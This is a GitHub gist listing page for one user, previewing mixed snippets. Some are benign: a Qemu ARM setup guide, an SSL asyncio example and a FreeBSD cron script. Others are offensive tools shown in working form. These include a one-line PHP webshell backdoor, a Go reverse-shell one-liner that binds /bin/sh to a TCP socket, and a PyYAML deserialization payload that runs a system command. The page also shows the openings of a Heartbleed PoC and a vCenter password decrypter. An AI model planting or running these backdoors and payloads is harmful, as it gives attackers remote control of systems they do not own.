Skip to content

Instantly share code, notes, and snippets.

Avatar
👾

takeshix takeshixx

👾
View GitHub Profile
@takeshixx
takeshixx / ubuntu-xenial-armfh-qemu.md
Last active Jun 25, 2020
Running Ubuntu 16.04.1 armhf on Qemu
View ubuntu-xenial-armfh-qemu.md

Running Ubuntu 16.04.1 armhf on Qemu

This is a writeup about how to install Ubuntu 16.04.1 Xenial Xerus for the 32-bit hard-float ARMv7 (armhf) architecture on a Qemu VM via Ubuntu netboot.

The setup will create a Ubuntu VM with LPAE extensions (generic-lpae) enabled. However, this writeup should also work for non-LPAE (generic) kernels.

The performance of the resulting VM is quite good, and it allows VMs with >1G ram (compared to 256M on versatilepb and 1G on versatile-a9/versatile-a15). It also supports virtio disks whereas versatile-a9/versatile-a15 only support SD cards via the -sd argument.

Get netboot files

@takeshixx
takeshixx / hb-test.py
Last active Jun 10, 2020
OpenSSL heartbeat PoC with STARTTLS support.
View hb-test.py
#!/usr/bin/env python2
"""
Author: takeshix <takeshix@adversec.com>
PoC code for CVE-2014-0160. Original PoC by Jared Stafford (jspenguin@jspenguin.org).
Supportes all versions of TLS and has STARTTLS support for SMTP,POP3,IMAP,FTP and XMPP.
"""
import sys,struct,socket
from argparse import ArgumentParser
@takeshixx
takeshixx / shell.php
Created Apr 5, 2014
PHP webshell/backdoor
View shell.php
// Call: http://localhost/shell.php?f=system&c=id
<?@extract($_REQUEST);@die($f($c));?>
@takeshixx
takeshixx / vcops-passwords.py
Created Aug 12, 2014
VMware vCenter Operations Manager password de/encrypter
View vcops-passwords.py
#!/usr/bin/env python2
# VMware vCenter Operations Manager password de/encrypter
# author: takeshix@adversec.com
from sys import argv,exit
from base64 import b64encode,b64decode
from Crypto.Cipher import AES
class vCopsCrypt:
# AES128 wrapper class with PKCS5 padding
BLOCK_SIZE = 16
View yamlexec.py
yaml.load('!!python/object/apply:os.system ["id"]')
View parser.c
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
#define ETH_HLEN 14
/*eBPF program.
Filter Packets
return 0 -> DROP the packet
return -1 -> KEEP the packet and return it to user space (userspace can read it from the socket_fd )
@takeshixx
takeshixx / csgoblog.py
Last active Dec 5, 2018
Poll CS:GO blog for new blog posts.
View csgoblog.py
#!/usr/bin/env python3
import sys
import time
import requests
import smtplib
import email.message
from lxml import html
SMTP_HOST = 'localhost'
SMTP_PORT = 25
@takeshixx
takeshixx / shell.go
Last active Oct 30, 2018
Golang reverse shell
View shell.go
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","127.0.0.1:1337");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run();}'>/tmp/sh.go&&go run /tmp/sh.go
@takeshixx
takeshixx / asyncio_ssl_example.py
Created May 12, 2016 — forked from messa/asyncio_ssl_example.py
Python asyncio + SSL TCP client/server example
View asyncio_ssl_example.py
#!/usr/bin/env python3
import asyncio
import multiprocessing
import os
import ssl
from time import sleep
port = 9000
@takeshixx
takeshixx / contab-jails.sh
Last active Mar 22, 2017
Crontab script for FreeBSD Jails (update seperate ports tree, run portaudit, check for port updates)
View contab-jails.sh
#!/usr/local/bin/zsh
JAIL_PORTS=/usr/jails/ports
SHELL=/usr/local/bin/zsh
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin:/root/bin
SECTION=' * * * * * * '
DELIMITER='------------------------------'
portsnap -p $JAIL_PORTS fetch extract &>/dev/null || echo "Updating ports tree failed!"
echo "# VULNERABILITIES"
You can’t perform that action at this time.